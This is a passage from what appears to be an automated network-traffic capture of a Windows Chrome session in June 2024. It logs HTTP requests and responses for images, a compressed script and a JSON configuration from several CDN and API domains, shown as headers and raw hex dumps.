                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE6[414],EU-GER-frankfurt-GLOBAL1-CACHE7[403,TCP_MISS,407],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: cce1b05093a427959a7ebbafeb162d8d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          148192.168.2.54989290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC635OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[6],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE2[422],EU-GER-frankfurt-GLOBAL1-CACHE12[405,TCP_MISS,419],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 33fd57baa181539b64b276afc33bd1a6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814483
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:55 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:55 UTC1513INData Raw: a2 ab c2 cc 46 9c 81 3a a5 2c 49 3c 4b 61 dc 03 06 1c 3b f1 4d 2b b3 2a 91 20 69 8c 70 00 70 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba
                                                                                                                                                          Data Ascii: F:,I<Ka;M+* ippy<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          149192.168.2.54987638.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC539OUTGET /message_zh_CN.js?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:56 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:56 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 30 3a 35 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          2024-06-09 22:40:56 UTC52INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: application/javascript;charset=UTF-8
                                                                                                                                                          2024-06-09 22:40:56 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:56 UTC24INData Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a
                                                                                                                                                          Data Ascii: Content-Encoding: gzip
                                                                                                                                                          2024-06-09 22:40:56 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:56 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 30 3a 35 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:40:55 GMT
                                                                                                                                                          2024-06-09 22:40:56 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:40:56 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          150192.168.2.549891183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC541OUTGET /ftl/commonPage/js/gui-base.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 15779
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-QD-MP-02-09
                                                                                                                                                          ETag: W/"64ddbaed-ee5c"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:58 GMT
                                                                                                                                                          Last-Modified: Thu, 17 Aug 2023 06:15:09 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:58 GMT
                                                                                                                                                          Age: 297357
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;qdmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-QD-MP-02-09
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-21
                                                                                                                                                          X-Cdn-Request-ID: b969ccfd510ccdfc7596bfca7bfd0815
                                                                                                                                                          2024-06-09 22:40:56 UTC15678INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 97 1b c7 71 e0 cf e6 5f 31 3b 5a ef ce 2c 06 58 80 34 65 0b d8 d9 7d e4 92 b4 68 4b 22 45 52 92 93 bd 95 de 00 18 2c 86 c4 62 20 60 c0 25 b5 8b 7b 4a 62 47 92 2d c5 8a f3 61 c7 71 72 96 e3 17 e9 e9 22 39 f7 12 df 39 b2 7d f9 e1 fe 94 d3 2e c9 9f f2 2f 5c 55 57 77 4f f7 4c cf 00 4b 4a 79 ef 60 8b 3b d3 1f d5 55 d5 55 d5 d5 d5 1f 63 ad af 2d 9d b1 d6 ac 6f 06 fb e1 c5 f8 de 4b 57 ab df ba 59 6d 07 93 d0 72 8e ff db 67 0f 3e 78 f3 e1 77 7f 7a f2 b3 7f fa 8f df bd 83 a5 ee 86 e3 49 14 0f ad 46 ad 5e 6b 60 c2 85 69 d2 8f c7 4d eb 66 12 de 0d 87 98 72 29 48 42 6b 3f ee 46 bd 28 ec 5a 67 eb 8d af 57 eb 5f ab 9e 7d 06 f2 d6 cf 58 ac 35 5f fe ac 4e bc bf 1f 0f ab c7 df fb a7 e3 ef fd 0f 6a 4a c9 a6 3a bd e9 b0 93 60 ab e3 70
                                                                                                                                                          Data Ascii: }q_1;Z,X4e}hK"ER,b `%{JbG-aqr"99}./\UWwOLKJy`;UUc-oKWYmrg>xwzIF^k`iMfr)HBk?F(ZgW_}X5_NjJ:`p
                                                                                                                                                          2024-06-09 22:40:56 UTC101INData Raw: 50 16 e4 ca c3 93 9c 1f b1 b9 f9 64 67 55 02 b0 18 84 d5 dd 54 c6 67 2e 33 05 40 04 a7 51 60 88 a6 bd 0f 36 31 1c 57 93 08 2f 0c e7 57 1e 9d d1 da cd 95 a2 9b f8 5a 92 35 4b a2 bb 55 ca f5 5a 56 2d 4e fa f0 d8 e9 8f d5 66 8a 0a 77 71 af 54 8d 0d 40 4e e3 7c 5d d1 d7 59 eb ff 01 44 bd cf 01 5c ee 00 00
                                                                                                                                                          Data Ascii: PdgUTg.3@Q`61W/WZ5KUZV-NfwqT@N|]YD\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          151192.168.2.549893163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC557OUTGET /ocs/zbw?r=5552162052 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC488INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache10.l2hk3[3,0], cache13.l2sg3[40,0], ens-cache16.de5[221,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55ca417179728557838217e
                                                                                                                                                          2024-06-09 22:40:56 UTC14238INData Raw: 33 37 39 36 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 3796{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:40:56 UTC4166INData Raw: 31 30 33 65 0d 0a 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 37 38 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 37 39 22 3a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 38 30 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 38 31 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 33 39 38 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 38 33 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 30 32 2d 30 31 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 38 34 22 3a 20 7b
                                                                                                                                                          Data Ascii: 103e": {"v":"230607-01","t":109},"t3978": "230607-01","t3979": {"v":"240130-01","t":109},"t3980": {"v":"230620-01","t":104},"t3981": {"v":"230620-01","t":111},"t3982": {"v":"240516-03","t":110},"t3983": {"v":"240502-01","t":110},"t3984": {
                                                                                                                                                          2024-06-09 22:40:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          152192.168.2.54989690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC635OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE7[393],EU-GER-frankfurt-GLOBAL1-CACHE9[384,TCP_MISS,389],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e29ca6e5ee42a857a69420409fd3965c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          153192.168.2.54989790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC366OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:55 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[1],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE11[408],EU-GER-frankfurt-GLOBAL1-CACHE12[401,TCP_MISS,404],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a2796d412a580e297f027945adafa374
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464137
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
